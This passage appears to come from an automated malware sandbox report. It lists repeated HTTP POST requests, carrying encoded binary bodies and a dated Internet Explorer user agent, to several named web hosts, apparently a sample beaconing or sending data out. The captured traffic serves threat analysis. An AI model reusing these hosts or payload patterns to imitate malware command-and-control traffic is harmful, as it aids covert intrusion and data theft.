44 4b 47 67 30 46 61 77 6f 46 46 52 43 4e 34 4f 59 79 36 43 77 42 63 67 4d 36 58 34 64 71 67 78 72 47 68 52 34 66 4d 58 70 77 5a 7a 68 45 71 70 78 31 4d 32 36 53 65 47 71 7a 64 45 70 4d 78 5a 6d 35 4d 6d 30 67 6f 4e 68 5a 7a 6f 71 47 46 46 4f 6a 50 62 35 44 36 6d 59 49 74 63 64 70 46 73 5a 38 6d 30 39 39 4e 6e 4f 47 77 61 6c 56 4e 57 43 4f 4f 48 74 4f 41 74 63 52 5a 76 32 76 76 63 55 38 31 73 43 72 74 4c 6d 54 45 5a 63 52 74 62 7a 6b 4b 4d 42 4b 79 41 6a 45 46 70 37 58 74 2b 4f 54 6f 78 69 79 41 78 56 74 72 44 57 4e 6d 53 76 30 6b 45 4f 6d 74 63 79 7a 6a 6d 64 35 37 52 39 71 69 55 46 70 79 42 53 76 68 30 37 41 6f 39 76 59 4b 4b 6e 48 4e 6a 69 67 51 4c 6a 35 30 74 78 5a 31 64 71 76 43 72 6c 6e 62 4f 55 44 48 39 46 7a 2f 47 6e 38 39 66 67 63 36 59 6c 50 2f 35 43 4b 41 6d 77 78 75 63 6b 51 7a 6e 54 57 6f 5a 56 54 70 54 35 6d 61 62 46 37 35 4c 2f 6b 75 47 65 54 75 63 50 55 38 4e 75 78 6f 7a 30 57 70 51 57 45 62 42 32 37 73 43 56 77 6e 62 58 2b 46 62 75 45 55 74 79 41 3d 3d Data Ascii: povCQ/1GTMvZnPYKtFxM4jbwhSgrQh1RgXfQF1brSRCYzfvAMzZWmmhTXWRSP3U+nD5F8qq5D8EBKEFonYyqgGYIQhHtZ0zQLdMXsCXQd3oSCgePHcFnZanOURjOiy+WcnGnAafXeBKcos6jfWynVFmFRiIPBgkxIpYuTPmM5WfwLCW0w/KbWo+3x9paxjyf2IhE9bf9stic22o/nJP+RNTPwZnRhCUKtkhDDiyy6FK6JRIVVwo3ZpC6PNvRSrvZDKGg0FawoFFRCN4OYy6CwBcgM6X4dqgxrGhR4fMXpwZzhEqpx1M26SeGqzdEpMxZm5Mm0goNhZzoqGFFOjPb5D6mYItcdpFsZ8m099NnOGwalVNWCOOHtOAtcRZv2vvcU81sCrtLmTEZcRtbzkKMBKyAjEFp7Xt+OToxiyAxVtrDWNmSv0kEOmtcyzjmd57R9qiUFpyBSvh07Ao9vYKKnHNjigQLj50txZ1dqvCrlnbOUDH9Fz/Gn89fgc6YlP/5CKAmwxuckQznTWoZVTpT5mabF75L/kuGeTucPU8Nuxoz0WpQWEbB27sCVwnbX+FbuEUtyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 64 50 56 77 52 4b 56 4d 54 4d 75 51 61 37 52 65 54 4a 58 31 63 52 34 4d 55 6e 2f 7a 62 45 48 47 71 54 74 57 73 54 6d 4d 45 55 50 41 41 48 75 69 51 50 4b 59 63 2f 49 48 47 73 66 79 6c 44 71 55 65 46 46 68 67 48 78 70 53 59 54 34 77 46 38 31 36 6e 58 2b 38 4f 67 36 49 72 77 2b 69 59 4e 4d 4c 73 68 74 67 65 43 4a 73 76 52 6a 4d 58 34 37 32 34 47 50 72 68 36 48 62 6f 5a 53 35 59 7a 7a 31 78 56 78 41 4f 76 56 54 79 53 6e 59 61 54 77 35 4b 39 4e 39 57 7a 42 74 51 52 45 39 50 32 2b 61 75 79 71 57 75 4c 63 75 46 4f 6b 6e 46 35 50 44 35 32 4f 54 30 61 56 67 4b 42 5a 69 53 74 69 32 4c 46 6d 4b 59 49 72 6d 45 70 4e 34 79 32 41 53 61 42 4c 72 37 74 4e 37 35 4d 4c 6e 39 48 56 48 69 30 33 41 54 77 38 61 41 77 2f 76 51 4c 41 55 78 31 66 45 6a 6d 54 59 6b 68 69 6b 2f 70 74 44 6c 6b 4b 4c 47 4c 38 74 6b 50 78 57 47 58 42 58 2b 4e 63 53 55 75 4d 46 69 7a 79 68 4f 30 4c 31 6b 59 4b 65 73 52 36 4b 62 76 4c 76 74 46 77 4b 77 2b 6a 73 44 75 53 62 57 48 64 43 52 2b 69 56 58 2f 62 77 6d 4a 53 64 67 5a 30 63 46 42 71 30 6b 54 7a 76 42 63 44 52 39 2f 61 4a 72 46 37 35 6c 69 62 6e 46 46 63 71 76 67 6f 43 4c 47 62 52 53 76 4e 48 79 39 5a 63 72 4e 7a 52 57 57 37 73 4f 73 55 6a 2f 70 2b 6f 58 62 30 6c 62 4e 2b 66 56 63 54 6e 45 30 39 45 43 4d 30 5a 71 48 66 65 2f 52 62 2b 57 71 52 68 51 4a 66 57 46 31 38 48 54 66 4b 58 2f 4b 31 51 55 65 79 7a 69 4d 5a 35 73 53 7a 6e 58 71 5a 54 4c 47 38 33 53 64 69 66 39 4f 36 64 67 4a 38 74 2f 63 76 73 51 54 57 4a 4f 78 4e 31 67 49 76 37 36 36 6e 79 30 48 42 35 67 32 52 75 38 43 70 75 59 30 6e 74 30 43 32 69 58 65 71 4a 4f 47 70 57 74 76 50 55 6f 77 5a 55 69 4a 49 48 67 71 76 79 41 3d 3d Data Ascii: dPVwRKVMTMuQa7ReTJX1cR4MUn/zbEHGqTtWsTmMEUPAAHuiQPKYc/IHGsfylDqUeFFhgHxpSYT4wF816nX+8Og6Irw+iYNMLshtgeCJsvRjMX4724GPrh6HboZS5Yzz1xVxAOvVTySnYaTw5K9N9WzBtQRE9P2+auyqWuLcuFOknF5PD52OT0aVgKBZiSti2LFmKYIrmEpN4y2ASaBLr7tN75MLn9HVHi03ATw8aAw/vQLAUx1fEjmTYkhik/ptDlkKLGL8tkPxWGXBX+NcSUuMFizyhO0L1kYKesR6KbvLvtFwKw+jsDuSbWHdCR+iVX/bwmJSdgZ0cFBq0kTzvBcDR9/aJrF75libnFFcqvgoCLGbRSvNHy9ZcrNzRWW7sOsUj/p+oXb0lbN+fVcTnE09ECM0ZqHfe/Rb+WqRhQJfWF18HTfKX/K1QUeyziMZ5sSznXqZTLG83Sdif9O6dgJ8t/cvsQTWJOxN1gIv766ny0HB5g2Ru8CpuY0nt0C2iXeqJOGpWtvPUowZUiJIHgqvyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 70 6f 76 43 51 2f 31 47 54 4d 76 5a 6e 50 59 4b 74 46 78 4d 34 6a 62 77 68 53 67 72 51 68 31 52 67 58 66 51 46 31 62 72 53 52 43 59 7a 66 76 41 4d 7a 5a 57 6d 6d 68 54 58 57 52 53 50 33 55 2b 6e 44 35 46 38 71 71 35 44 38 45 42 4b 45 46 6f 6e 59 79 71 67 47 59 49 51 68 48 74 5a 30 7a 51 4c 64 4d 58 73 43 58 51 64 33 6f 53 43 67 65 50 48 63 46 6e 5a 61 6e 4f 55 52 6a 4f 69 79 2b 57 63 6e 47 6e 41 61 66 58 65 42 4b 63 6f 73 36 6a 66 57 79 6e 56 46 6d 46 52 69 49 50 42 67 6b 78 49 70 59 75 54 50 6d 4d 35 57 66 77 4c 43 57 30 77 2f 4b 62 57 6f 2b 33 78 39 70 61 78 6a 79 66 32 49 68 45 39 62 66 39 73 74 69 63 32 32 6f 2f 6e 4a 50 2b 52 4e 54 50 77 5a 6e 52 68 43 55 4b 74 6b 68 44 44 69 79 79 36 46 4b 36 4a 52 49 56 56 77 6f 33 5a 70 43 36 50 4e 76 52 53 72 76 5a 44 4b 47 67 30 46 61 77 6f 46 46 52 43 4e 34 4f 59 79 36 43 77 42 63 67 4d 36 58 34 64 71 67 78 72 47 68 52 34 66 4d 58 70 77 5a 7a 68 45 71 70 78 31 4d 32 36 53 65 47 71 7a 64 45 70 4d 78 5a 6d 35 4d 6d 30 67 6f 4e 68 5a 7a 6f 71 47 46 46 4f 6a 50 62 35 44 36 6d 59 49 74 63 64 70 46 73 5a 38 6d 30 39 39 4e 6e 4f 47 77 61 6c 56 4e 57 43 4f 4f 48 74 4f 41 74 63 52 5a 76 32 76 76 63 55 38 31 73 43 72 74 4c 6d 54 45 5a 63 52 74 62 7a 6b 4b 4d 42 4b 79 41 6a 45 46 70 37 58 74 2b 4f 54 6f 78 69 79 41 78 56 74 72 44 57 4e 6d 53 76 30 6b 45 4f 6d 74 63 79 7a 6a 6d 64 35 37 52 39 71 69 55 46 70 79 42 53 76 68 30 37 41 6f 39 76 59 4b 4b 6e 48 4e 6a 69 67 51 4c 6a 35 30 74 78 5a 31 64 71 76 43 72 6c 6e 62 4f 55 44 48 39 46 7a 2f 47 6e 38 39 66 67 63 36 59 6c 50 2f 35 43 4b 41 6d 77 78 75 63 6b 51 7a 6e 54 57 6f 5a 56 54 70 54 35 6d 61 62 46 37 35 4c 2f 6b 75 47 65 54 75 63 50 55 38 4e 75 78 6f 7a 30 57 70 51 57 45 62 42 32 37 73 43 56 77 6e 62 58 2b 46 62 75 45 55 74 79 41 3d 3d Data Ascii: povCQ/1GTMvZnPYKtFxM4jbwhSgrQh1RgXfQF1brSRCYzfvAMzZWmmhTXWRSP3U+nD5F8qq5D8EBKEFonYyqgGYIQhHtZ0zQLdMXsCXQd3oSCgePHcFnZanOURjOiy+WcnGnAafXeBKcos6jfWynVFmFRiIPBgkxIpYuTPmM5WfwLCW0w/KbWo+3x9paxjyf2IhE9bf9stic22o/nJP+RNTPwZnRhCUKtkhDDiyy6FK6JRIVVwo3ZpC6PNvRSrvZDKGg0FawoFFRCN4OYy6CwBcgM6X4dqgxrGhR4fMXpwZzhEqpx1M26SeGqzdEpMxZm5Mm0goNhZzoqGFFOjPb5D6mYItcdpFsZ8m099NnOGwalVNWCOOHtOAtcRZv2vvcU81sCrtLmTEZcRtbzkKMBKyAjEFp7Xt+OToxiyAxVtrDWNmSv0kEOmtcyzjmd57R9qiUFpyBSvh07Ao9vYKKnHNjigQLj50txZ1dqvCrlnbOUDH9Fz/Gn89fgc6YlP/5CKAmwxuckQznTWoZVTpT5mabF75L/kuGeTucPU8Nuxoz0WpQWEbB27sCVwnbX+FbuEUtyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 64 50 56 77 52 4b 56 4d 54 4d 75 51 61 37 52 65 54 4a 58 31 63 52 34 4d 55 6e 2f 7a 62 45 48 47 71 54 74 57 73 54 6d 4d 45 55 50 41 41 48 75 69 51 50 4b 59 63 2f 49 48 47 73 66 79 6c 44 71 55 65 46 46 68 67 48 78 70 53 59 54 34 77 46 38 31 36 6e 58 2b 38 4f 67 36 49 72 77 2b 69 59 4e 4d 4c 73 68 74 67 65 43 4a 73 76 52 6a 4d 58 34 37 32 34 47 50 72 68 36 48 62 6f 5a 53 35 59 7a 7a 31 78 56 78 41 4f 76 56 54 79 53 6e 59 61 54 77 35 4b 39 4e 39 57 7a 42 74 51 52 45 39 50 32 2b 61 75 79 71 57 75 4c 63 75 46 4f 6b 6e 46 35 50 44 35 32 4f 54 30 61 56 67 4b 42 5a 69 53 74 69 32 4c 46 6d 4b 59 49 72 6d 45 70 4e 34 79 32 41 53 61 42 4c 72 37 74 4e 37 35 4d 4c 6e 39 48 56 48 69 30 33 41 54 77 38 61 41 77 2f 76 51 4c 41 55 78 31 66 45 6a 6d 54 59 6b 68 69 6b 2f 70 74 44 6c 6b 4b 4c 47 4c 38 74 6b 50 78 57 47 58 42 58 2b 4e 63 53 55 75 4d 46 69 7a 79 68 4f 30 4c 31 6b 59 4b 65 73 52 36 4b 62 76 4c 76 74 46 77 4b 77 2b 6a 73 44 75 53 62 57 48 64 43 52 2b 69 56 58 2f 62 77 6d 4a 53 64 67 5a 30 63 46 42 71 30 6b 54 7a 76 42 63 44 52 39 2f 61 4a 72 46 37 35 6c 69 62 6e 46 46 63 71 76 67 6f 43 4c 47 62 52 53 76 4e 48 79 39 5a 63 72 4e 7a 52 57 57 37 73 4f 73 55 6a 2f 70 2b 6f 58 62 30 6c 62 4e 2b 66 56 63 54 6e 45 30 39 45 43 4d 30 5a 71 48 66 65 2f 52 62 2b 57 71 52 68 51 4a 66 57 46 31 38 48 54 66 4b 58 2f 4b 31 51 55 65 79 7a 69 4d 5a 35 73 53 7a 6e 58 71 5a 54 4c 47 38 33 53 64 69 66 39 4f 36 64 67 4a 38 74 2f 63 76 73 51 54 57 4a 4f 78 4e 31 67 49 76 37 36 36 6e 79 30 48 42 35 67 32 52 75 38 43 70 75 59 30 6e 74 30 43 32 69 58 65 71 4a 4f 47 70 57 74 76 50 55 6f 77 5a 55 69 4a 49 48 67 71 76 79 41 3d 3d Data Ascii: dPVwRKVMTMuQa7ReTJX1cR4MUn/zbEHGqTtWsTmMEUPAAHuiQPKYc/IHGsfylDqUeFFhgHxpSYT4wF816nX+8Og6Irw+iYNMLshtgeCJsvRjMX4724GPrh6HboZS5Yzz1xVxAOvVTySnYaTw5K9N9WzBtQRE9P2+auyqWuLcuFOknF5PD52OT0aVgKBZiSti2LFmKYIrmEpN4y2ASaBLr7tN75MLn9HVHi03ATw8aAw/vQLAUx1fEjmTYkhik/ptDlkKLGL8tkPxWGXBX+NcSUuMFizyhO0L1kYKesR6KbvLvtFwKw+jsDuSbWHdCR+iVX/bwmJSdgZ0cFBq0kTzvBcDR9/aJrF75libnFFcqvgoCLGbRSvNHy9ZcrNzRWW7sOsUj/p+oXb0lbN+fVcTnE09ECM0ZqHfe/Rb+WqRhQJfWF18HTfKX/K1QUeyziMZ5sSznXqZTLG83Sdif9O6dgJ8t/cvsQTWJOxN1gIv766ny0HB5g2Ru8CpuY0nt0C2iXeqJOGpWtvPUowZUiJIHgqvyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 36 54 30 59 52 6d 5a 61 54 4d 73 2b 38 73 62 62 41 53 35 4b 7a 34 6c 38 68 4e 31 47 2b 4e 75 68 2b 6a 51 41 42 32 46 35 45 63 32 71 79 76 37 57 75 32 6c 79 70 42 78 6c 4b 71 69 61 34 2b 55 4d 66 39 2f 55 78 62 55 49 4e 36 6c 53 62 56 50 71 62 39 34 72 51 74 34 6c 44 4f 67 53 7a 42 57 33 46 4c 38 72 51 51 38 65 2f 6b 54 50 5a 59 69 36 7a 4b 5a 51 4f 74 2b 4d 67 65 52 34 77 62 35 42 64 62 49 32 43 63 58 48 37 51 46 5a 39 4b 48 34 59 69 4f 77 78 54 42 4b 47 61 50 48 5a 6a 70 34 74 77 53 55 55 61 31 52 58 6a 6b 6d 56 4c 50 51 5a 49 4d 77 68 38 30 32 30 7a 44 73 62 5a 63 4c 68 68 79 77 50 69 5a 53 32 36 57 31 73 68 4b 66 4d 49 6b 51 39 53 4b 33 59 64 62 72 46 57 2f 6a 64 55 56 6d 35 51 58 6b 38 69 78 63 31 37 7a 49 54 6d 74 62 51 34 56 79 73 44 48 62 48 78 31 50 72 36 56 58 45 6f 2b 6c 2b 32 75 53 30 2b 34 4a 59 36 6b 65 68 33 39 4b 39 63 74 69 35 69 63 32 70 77 31 59 51 48 45 4d 36 73 4e 6f 6b 55 41 2b 70 4c 6b 2f 2f 64 31 2b 35 64 65 56 6b 49 69 6e 62 58 38 39 6e 79 6a 73 49 70 54 45 4c 77 56 67 35 68 49 57 47 33 4c 43 48 39 6c 6a 54 30 4e 70 31 52 69 5a 4f 43 32 37 78 75 7a 4f 74 35 63 4b 52 63 61 4c 38 64 6e 64 70 6a 31 68 65 6d 44 5a 76 4a 54 4c 2b 69 52 4a 53 43 61 6b 4b 59 4b 4a 66 39 2f 41 4d 4b 30 64 64 32 52 44 43 46 68 73 68 54 6a 59 71 36 58 33 4c 76 52 6b 75 63 6e 4b 4c 6a 6c 6c 56 56 79 4e 6d 51 48 30 32 36 72 38 76 6e 36 50 30 32 50 53 56 61 32 5a 54 2f 5a 76 73 69 7a 6a 55 62 48 5a 4a 72 71 56 4a 75 46 30 41 72 62 70 67 52 73 74 70 46 4c 4c 4b 53 48 61 6c 41 57 45 54 58 38 47 50 38 33 57 63 42 6d 63 58 4e 57 7a 4b 45 47 57 53 65 59 36 76 46 62 44 49 52 56 6a 79 36 68 62 77 30 62 4c 33 4c 2b 76 41 55 4f 50 6d 32 72 38 68 32 35 48 6c 77 4f 42 6f 4f 35 42 34 75 72 45 Data Ascii: 6T0YRmZaTMs+8sbbAS5Kz4l8hN1G+Nuh+jQAB2F5Ec2qyv7Wu2lypBxlKqia4+UMf9/UxbUIN6lSbVPqb94rQt4lDOgSzBW3FL8rQQ8e/kTPZYi6zKZQOt+MgeR4wb5BdbI2CcXH7QFZ9KH4YiOwxTBKGaPHZjp4twSUUa1RXjkmVLPQZIMwh8020zDsbZcLhhywPiZS26W1shKfMIkQ9SK3YdbrFW/jdUVm5QXk8ixc17zITmtbQ4VysDHbHx1Pr6VXEo+l+2uS0+4JY6keh39K9cti5ic2pw1YQHEM6sNokUA+pLk//d1+5deVkIinbX89nyjsIpTELwVg5hIWG3LCH9ljT0Np1RiZOC27xuzOt5cKRcaL8dndpj1hemDZvJTL+iRJSCakKYKJf9/AMK0dd2RDCFhshTjYq6X3LvRkucnKLjllVVyNmQH026r8vn6P02PSVa2ZT/ZvsizjUbHZJrqVJuF0ArbpgRstpFLLKSHalAWETX8GP83WcBmcXNWzKEGWSeY6vFbDIRVjy6hbw0bL3L+vAUOPm2r8h25HlwOBoO5B4urE
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 64 50 56 77 52 4b 56 4d 54 4d 75 51 61 37 52 65 54 4a 58 31 63 52 34 4d 55 6e 2f 7a 62 45 48 47 71 54 74 57 73 54 6d 4d 45 55 50 41 41 48 75 69 51 50 4b 59 63 2f 49 48 47 73 66 79 6c 44 71 55 65 46 46 68 67 48 78 70 53 59 54 34 77 46 38 31 36 6e 58 2b 38 4f 67 36 49 72 77 2b 69 59 4e 4d 4c 73 68 74 67 65 43 4a 73 76 52 6a 4d 58 34 37 32 34 47 50 72 68 36 48 62 6f 5a 53 35 59 7a 7a 31 78 56 78 41 4f 76 56 54 79 53 6e 59 61 54 77 35 4b 39 4e 39 57 7a 42 74 51 52 45 39 50 32 2b 61 75 79 71 57 75 4c 63 75 46 4f 6b 6e 46 35 50 44 35 32 4f 54 30 61 56 67 4b 42 5a 69 53 74 69 32 4c 46 6d 4b 59 49 72 6d 45 70 4e 34 79 32 41 53 61 42 4c 72 37 74 4e 37 35 4d 4c 6e 39 48 56 48 69 30 33 41 54 77 38 61 41 77 2f 76 51 4c 41 55 78 31 66 45 6a 6d 54 59 6b 68 69 6b 2f 70 74 44 6c 6b 4b 4c 47 4c 38 74 6b 50 78 57 47 58 42 58 2b 4e 63 53 55 75 4d 46 69 7a 79 68 4f 30 4c 31 6b 59 4b 65 73 52 36 4b 62 76 4c 76 74 46 77 4b 77 2b 6a 73 44 75 53 62 57 48 64 43 52 2b 69 56 58 2f 62 77 6d 4a 53 64 67 5a 30 63 46 42 71 30 6b 54 7a 76 42 63 44 52 39 2f 61 4a 72 46 37 35 6c 69 62 6e 46 46 63 71 76 67 6f 43 4c 47 62 52 53 76 4e 48 79 39 5a 63 72 4e 7a 52 57 57 37 73 4f 73 55 6a 2f 70 2b 6f 58 62 30 6c 62 4e 2b 66 56 63 54 6e 45 30 39 45 43 4d 30 5a 71 48 66 65 2f 52 62 2b 57 71 52 68 51 4a 66 57 46 31 38 48 54 66 4b 58 2f 4b 31 51 55 65 79 7a 69 4d 5a 35 73 53 7a 6e 58 71 5a 54 4c 47 38 33 53 64 69 66 39 4f 36 64 67 4a 38 74 2f 63 76 73 51 54 57 4a 4f 78 4e 31 67 49 76 37 36 36 6e 79 30 48 42 35 67 32 52 75 38 43 70 75 59 30 6e 74 30 43 32 69 58 65 71 4a 4f 47 70 57 74 76 50 55 6f 77 5a 55 69 4a 49 48 67 71 76 79 41 3d 3d Data Ascii: dPVwRKVMTMuQa7ReTJX1cR4MUn/zbEHGqTtWsTmMEUPAAHuiQPKYc/IHGsfylDqUeFFhgHxpSYT4wF816nX+8Og6Irw+iYNMLshtgeCJsvRjMX4724GPrh6HboZS5Yzz1xVxAOvVTySnYaTw5K9N9WzBtQRE9P2+auyqWuLcuFOknF5PD52OT0aVgKBZiSti2LFmKYIrmEpN4y2ASaBLr7tN75MLn9HVHi03ATw8aAw/vQLAUx1fEjmTYkhik/ptDlkKLGL8tkPxWGXBX+NcSUuMFizyhO0L1kYKesR6KbvLvtFwKw+jsDuSbWHdCR+iVX/bwmJSdgZ0cFBq0kTzvBcDR9/aJrF75libnFFcqvgoCLGbRSvNHy9ZcrNzRWW7sOsUj/p+oXb0lbN+fVcTnE09ECM0ZqHfe/Rb+WqRhQJfWF18HTfKX/K1QUeyziMZ5sSznXqZTLG83Sdif9O6dgJ8t/cvsQTWJOxN1gIv766ny0HB5g2Ru8CpuY0nt0C2iXeqJOGpWtvPUowZUiJIHgqvyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 64 50 56 77 52 4b 56 4d 54 4d 75 51 61 37 52 65 54 4a 58 31 63 52 34 4d 55 6e 2f 7a 62 45 48 47 71 54 74 57 73 54 6d 4d 45 55 50 41 41 48 75 69 51 50 4b 59 63 2f 49 48 47 73 66 79 6c 44 71 55 65 46 46 68 67 48 78 70 53 59 54 34 77 46 38 31 36 6e 58 2b 38 4f 67 36 49 72 77 2b 69 59 4e 4d 4c 73 68 74 67 65 43 4a 73 76 52 6a 4d 58 34 37 32 34 47 50 72 68 36 48 62 6f 5a 53 35 59 7a 7a 31 78 56 78 41 4f 76 56 54 79 53 6e 59 61 54 77 35 4b 39 4e 39 57 7a 42 74 51 52 45 39 50 32 2b 61 75 79 71 57 75 4c 63 75 46 4f 6b 6e 46 35 50 44 35 32 4f 54 30 61 56 67 4b 42 5a 69 53 74 69 32 4c 46 6d 4b 59 49 72 6d 45 70 4e 34 79 32 41 53 61 42 4c 72 37 74 4e 37 35 4d 4c 6e 39 48 56 48 69 30 33 41 54 77 38 61 41 77 2f 76 51 4c 41 55 78 31 66 45 6a 6d 54 59 6b 68 69 6b 2f 70 74 44 6c 6b 4b 4c 47 4c 38 74 6b 50 78 57 47 58 42 58 2b 4e 63 53 55 75 4d 46 69 7a 79 68 4f 30 4c 31 6b 59 4b 65 73 52 36 4b 62 76 4c 76 74 46 77 4b 77 2b 6a 73 44 75 53 62 57 48 64 43 52 2b 69 56 58 2f 62 77 6d 4a 53 64 67 5a 30 63 46 42 71 30 6b 54 7a 76 42 63 44 52 39 2f 61 4a 72 46 37 35 6c 69 62 6e 46 46 63 71 76 67 6f 43 4c 47 62 52 53 76 4e 48 79 39 5a 63 72 4e 7a 52 57 57 37 73 4f 73 55 6a 2f 70 2b 6f 58 62 30 6c 62 4e 2b 66 56 63 54 6e 45 30 39 45 43 4d 30 5a 71 48 66 65 2f 52 62 2b 57 71 52 68 51 4a 66 57 46 31 38 48 54 66 4b 58 2f 4b 31 51 55 65 79 7a 69 4d 5a 35 73 53 7a 6e 58 71 5a 54 4c 47 38 33 53 64 69 66 39 4f 36 64 67 4a 38 74 2f 63 76 73 51 54 57 4a 4f 78 4e 31 67 49 76 37 36 36 6e 79 30 48 42 35 67 32 52 75 38 43 70 75 59 30 6e 74 30 43 32 69 58 65 71 4a 4f 47 70 57 74 76 50 55 6f 77 5a 55 69 4a 49 48 67 71 76 79 41 3d 3d Data Ascii: dPVwRKVMTMuQa7ReTJX1cR4MUn/zbEHGqTtWsTmMEUPAAHuiQPKYc/IHGsfylDqUeFFhgHxpSYT4wF816nX+8Og6Irw+iYNMLshtgeCJsvRjMX4724GPrh6HboZS5Yzz1xVxAOvVTySnYaTw5K9N9WzBtQRE9P2+auyqWuLcuFOknF5PD52OT0aVgKBZiSti2LFmKYIrmEpN4y2ASaBLr7tN75MLn9HVHi03ATw8aAw/vQLAUx1fEjmTYkhik/ptDlkKLGL8tkPxWGXBX+NcSUuMFizyhO0L1kYKesR6KbvLvtFwKw+jsDuSbWHdCR+iVX/bwmJSdgZ0cFBq0kTzvBcDR9/aJrF75libnFFcqvgoCLGbRSvNHy9ZcrNzRWW7sOsUj/p+oXb0lbN+fVcTnE09ECM0ZqHfe/Rb+WqRhQJfWF18HTfKX/K1QUeyziMZ5sSznXqZTLG83Sdif9O6dgJ8t/cvsQTWJOxN1gIv766ny0HB5g2Ru8CpuY0nt0C2iXeqJOGpWtvPUowZUiJIHgqvyA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 36 54 30 59 52 6d 5a 61 54 4d 73 2b 38 73 62 62 41 53 35 4b 7a 34 6c 38 68 4e 31 47 2b 4e 75 68 2b 6a 51 41 42 32 46 35 45 63 32 71 79 76 37 57 75 32 6c 79 70 42 78 6c 4b 71 69 61 34 2b 55 4d 66 39 2f 55 78 62 55 49 4e 36 6c 53 62 56 50 71 62 39 34 72 51 74 34 6c 44 4f 67 53 7a 42 57 33 46 4c 38 72 51 51 38 65 2f 6b 54 50 5a 59 69 36 7a 4b 5a 51 4f 74 2b 4d 67 65 52 34 77 62 35 42 64 62 49 32 43 63 58 48 37 51 46 5a 39 4b 48 34 59 69 4f 77 78 54 42 4b 47 61 50 48 5a 6a 70 34 74 77 53 55 55 61 31 52 58 6a 6b 6d 56 4c 50 51 5a 49 4d 77 68 38 30 32 30 7a 44 73 62 5a 63 4c 68 68 79 77 50 69 5a 53 32 36 57 31 73 68 4b 66 4d 49 6b 51 39 53 4b 33 59 64 62 72 46 57 2f 6a 64 55 56 6d 35 51 58 6b 38 69 78 63 31 37 7a 49 54 6d 74 62 51 34 56 79 73 44 48 62 48 78 31 50 72 36 56 58 45 6f 2b 6c 2b 32 75 53 30 2b 34 4a 59 36 6b 65 68 33 39 4b 39 63 74 69 35 69 63 32 70 77 31 59 51 48 45 4d 36 73 4e 6f 6b 55 41 2b 70 4c 6b 2f 2f 64 31 2b 35 64 65 56 6b 49 69 6e 62 58 38 39 6e 79 6a 73 49 70 54 45 4c 77 56 67 35 68 49 57 47 33 4c 43 48 39 6c 6a 54 30 4e 70 31 52 69 5a 4f 43 32 37 78 75 7a 4f 74 35 63 4b 52 63 61 4c 38 64 6e 64 70 6a 31 68 65 6d 44 5a 76 4a 54 4c 2b 69 52 4a 53 43 61 6b 4b 59 4b 4a 66 39 2f 41 4d 4b 30 64 64 32 52 44 43 46 68 73 68 54 6a 59 71 36 58 33 4c 76 52 6b 75 63 6e 4b 4c 6a 6c 6c 56 56 79 4e 6d 51 48 30 32 36 72 38 76 6e 36 50 30 32 50 53 56 61 32 5a 54 2f 5a 76 73 69 7a 6a 55 62 48 5a 4a 72 71 56 4a 75 46 30 41 72 62 70 67 52 73 74 70 46 4c 4c 4b 53 48 61 6c 41 57 45 54 58 38 47 50 38 33 57 63 42 6d 63 58 4e 57 7a 4b 45 47 57 53 65 59 36 76 46 62 44 49 52 56 6a 79 36 68 62 77 30 62 4c 33 4c 2b 76 41 55 4f 50 6d 32 72 38 68 32 35 48 6c 77 4f 42 6f 4f 35 42 34 75 72 45 Data Ascii: 6T0YRmZaTMs+8sbbAS5Kz4l8hN1G+Nuh+jQAB2F5Ec2qyv7Wu2lypBxlKqia4+UMf9/UxbUIN6lSbVPqb94rQt4lDOgSzBW3FL8rQQ8e/kTPZYi6zKZQOt+MgeR4wb5BdbI2CcXH7QFZ9KH4YiOwxTBKGaPHZjp4twSUUa1RXjkmVLPQZIMwh8020zDsbZcLhhywPiZS26W1shKfMIkQ9SK3YdbrFW/jdUVm5QXk8ixc17zITmtbQ4VysDHbHx1Pr6VXEo+l+2uS0+4JY6keh39K9cti5ic2pw1YQHEM6sNokUA+pLk//d1+5deVkIinbX89nyjsIpTELwVg5hIWG3LCH9ljT0Np1RiZOC27xuzOt5cKRcaL8dndpj1hemDZvJTL+iRJSCakKYKJf9/AMK0dd2RDCFhshTjYq6X3LvRkucnKLjllVVyNmQH026r8vn6P02PSVa2ZT/ZvsizjUbHZJrqVJuF0ArbpgRstpFLLKSHalAWETX8GP83WcBmcXNWzKEGWSeY6vFbDIRVjy6hbw0bL3L+vAUOPm2r8h25HlwOBoO5B4urE
